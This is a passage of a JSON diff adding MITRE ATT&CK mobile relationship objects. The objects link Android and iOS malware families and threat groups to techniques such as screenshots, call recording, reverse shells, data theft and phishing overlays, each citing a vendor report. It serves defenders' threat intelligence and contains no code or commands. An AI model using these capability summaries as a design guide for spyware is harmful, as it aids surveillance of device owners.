"attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e35b013b-89e8-41b3-a518-7737234ab71b", + "type": "relationship", + "created": "2020-01-27T17:05:58.312Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "E. Xu, G. Guo. (2019, June 28). 
Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/", + "source_name": "Trend Micro Bouncing Golf 2019" + } + ], + "modified": "2020-01-27T17:05:58.312Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can take screenshots.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5b670281-0054-42b4-8e54-ea01a692f5bf", + "type": "relationship", + "created": "2021-10-01T14:42:48.900Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." 
+ } + ], + "modified": "2021-10-01T14:42:48.900Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can open a hidden menu when a specific phone number is called from the infected device.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--67c2b73d-cd51-4894-a7bd-fdd5d14b33a2", + "created": "2019-09-03T20:08:00.704Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Talos Gustuff Apr 2019", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Gustuff](https://attack.mitre.org/software/S0406) code is both obfuscated and packed with an FTT packer.(Citation: Talos Gustuff Apr 2019)", + "modified": "2022-04-15T17:18:58.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--51636761-2e35-44bf-9e56-e337adf97174", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--759a2e09-32b6-4857-9b6d-adf5dcee142b", + "type": "relationship", + "created": "2020-12-14T15:02:35.286Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Securelist Asacub", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020." 
+ } + ], + "modified": "2020-12-14T15:02:35.286Z", + "description": "[Asacub](https://attack.mitre.org/software/S0540) can collect various pieces of device network configuration information, such as mobile network operator.(Citation: Securelist Asacub)", + "relationship_type": "uses", + "source_ref": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ad2c8b49-bbfb-47dd-84bb-cd4dbc49a64c", + "type": "relationship", + "created": "2019-09-03T19:45:48.512Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." 
+ } + ], + "modified": "2019-09-11T13:25:19.210Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) Two attempts to connect to port 22011 to provide a remote reverse shell.(Citation: SWB Exodus March 2019)", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--948a447c-d783-4ba0-8516-a64140fcacd5", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0bc73eaf-a771-4ed0-b1f9-081ff4ca73ad", + "created": "2023-03-20T18:55:03.385Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:55:03.385Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--069b2328-442b-491e-962d-d3fe01f0549e", + "created": "2019-09-04T14:28:15.479Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-Monokle", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Monokle](https://attack.mitre.org/software/S0407) can be controlled via email and SMS from a set of \"control phones.\"(Citation: Lookout-Monokle)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fd8a4b6d-0e7b-4105-ad7b-576836be6394", + "created": "2021-02-08T16:36:20.639Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. 
Retrieved February 8, 2021.", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:07:15.780Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has region-locked their malicious applications during their Operation BULL campaign.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5a50d9da-3fa5-443e-8367-8a0520d58cae", + "created": "2020-12-24T22:04:27.902Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. 
Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:04:02.992Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has used HTTP POST requests for C2.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--34dd5c26-eec9-4288-8e53-677271d490b2", + "created": "2023-01-18T19:46:02.646Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. 
Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:43:57.834Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can use accessibility event logging to steal data in text fields.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--89d0de37-87ba-4aa8-832a-a2305e658a7d", + "created": "2023-03-20T15:55:09.279Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:55:09.279Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--d9e88203-2b5d-405f-a406-2933b1e3d7e4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d358ac0b-4c67-44e3-939b-24cd36d3c3fb", + "created": "2020-09-11T16:22:03.294Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "description": "M. Flossman. (2017, February 16). 
ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/viperrat-mobile-apt" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:58:57.686Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) can collect the device’s cell tower information.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--dd818ea5-adf5-41c7-93b5-f3b839a219fb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--19f220fd-94e8-4c8f-971d-ad37d7eeee80", + "created": "2022-03-31T19:51:41.431Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "iOS users should be instructed to not download applications from unofficial sources, as applications distributed via the Apple App Store cannot list installed applications on a device.", + "modified": "2022-03-31T19:51:41.431Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--12de5aeb-9427-4665-81a0-257c76d6f188", + "created": "2023-03-03T16:20:48.781Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": 
"Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:20:48.781Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has replaced device apps with ones it has downloaded.(Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--d3bc5020-f6a2-41c0-8ccb-5e563101b60c", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--88ded3fb-759e-4e96-946b-e7148c54856e", + "created": "2022-04-08T16:29:30.371Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-08T16:29:30.371Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--a91262d5-b9ff-463f-b8d2-12e4ea1eb3c9", + "target_ref": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0b531974-1a28-4f16-ba34-1f7c8371b6b2", + "created": "2023-03-20T15:28:54.837Z", + "revoked": false, + "object_marking_refs": [ + 
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:28:54.837Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--7827ced0-95e7-4d05-bdcf-0d8f2d37a3d3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--59aaa62b-a629-42c8-9bd2-8e75810135a9", + "created": "2022-04-05T19:52:32.201Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T19:52:32.201Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--3dd58c80-4c2e-458c-9503-1b2cd273c4d2", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ce26f077-c47a-4185-8ed7-ec0d9ae2b625", + "created": "2022-03-31T16:33:55.074Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-31T16:33:55.074Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--e4c347e9-fb91-4bc5-83b8-391e389131e2", + "target_ref": "attack-pattern--dd818ea5-adf5-41c7-93b5-f3b839a219fb", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + 
"x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--14474366-938a-4359-bf24-e2c718adfaf5", + "type": "relationship", + "created": "2020-06-26T14:55:13.382Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cybereason EventBot", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T14:55:13.382Z", + "description": "[EventBot](https://attack.mitre.org/software/S0478) can download new libraries when instructed to.(Citation: Cybereason EventBot)", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c65661a6-6047-4901-ac2c-3ca4b1bbbb28", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler-SuperMarioRun", + "description": "Viral Gandhi. (2017, January 12). Super Mario Run Malware #2 – DroidJack RAT. 
Retrieved January 20, 2017.", + "url": "https://www.zscaler.com/blogs/security-research/super-mario-run-malware-2-droidjack-rat" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:24:32.173Z", + "description": "[DroidJack](https://attack.mitre.org/software/S0320) captures call data.(Citation: Zscaler-SuperMarioRun)", + "relationship_type": "uses", + "source_ref": "malware--05c4f87c-be8f-46ea-8d9a-2a0aad8f52c1", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8a961514-3372-4c3e-b7ee-e3d053c3d5f3", + "type": "relationship", + "created": "2020-09-11T14:54:16.615Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." 
+ } + ], + "modified": "2020-09-11T14:54:16.615Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can record videos.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--670a0995-a789-4674-9e91-c74316cdef90", + "type": "relationship", + "created": "2020-09-11T14:54:16.621Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." 
+ } + ], + "modified": "2020-09-11T14:54:16.621Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can record audio from phone calls and the device microphone.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f28a2873-281f-405b-bad0-4a93dac8a5ee", + "created": "2020-11-24T17:55:12.895Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can show a phishing WebView pretending to be a Google service that collects credit card information.(Citation: Talos GPlayed)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--886849fc-f83c-4d69-b700-bfad0def765d", + "created": "2023-03-16T18:32:30.054Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T18:32:30.054Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f4cc3b3a-284d-4a2d-9ab8-e7fa916c4012", + "type": "relationship", + "created": "2020-12-14T14:52:03.218Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. 
Retrieved December 14, 2020." + } + ], + "modified": "2020-12-14T14:52:03.218Z", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) can obtain the running application.(Citation: Sophos Red Alert 2.0)", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--50ad2a8c-ed45-4376-be31-8bafa26ba794", + "type": "relationship", + "created": "2020-04-08T15:41:19.451Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." 
+ } + ], + "modified": "2020-04-08T15:41:19.451Z", + "description": "[Anubis](https://attack.mitre.org/software/S0422) can collect the device’s ID.(Citation: Cofense Anubis)", + "relationship_type": "uses", + "source_ref": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fb5c6c5e-53d4-4bb9-b9cf-74170058b19b", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "source_name": "Lookout-StealthMango" + } + ], + "modified": "2019-10-15T19:44:36.125Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) collected and exfiltrated data from the device, including sensitive letters/documents, stored photos, and stored audio files.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--716f68ee-1e77-4254-8f67-d8f3c71db678", + "type": "relationship", + "created": "2021-09-20T13:59:00.498Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). 
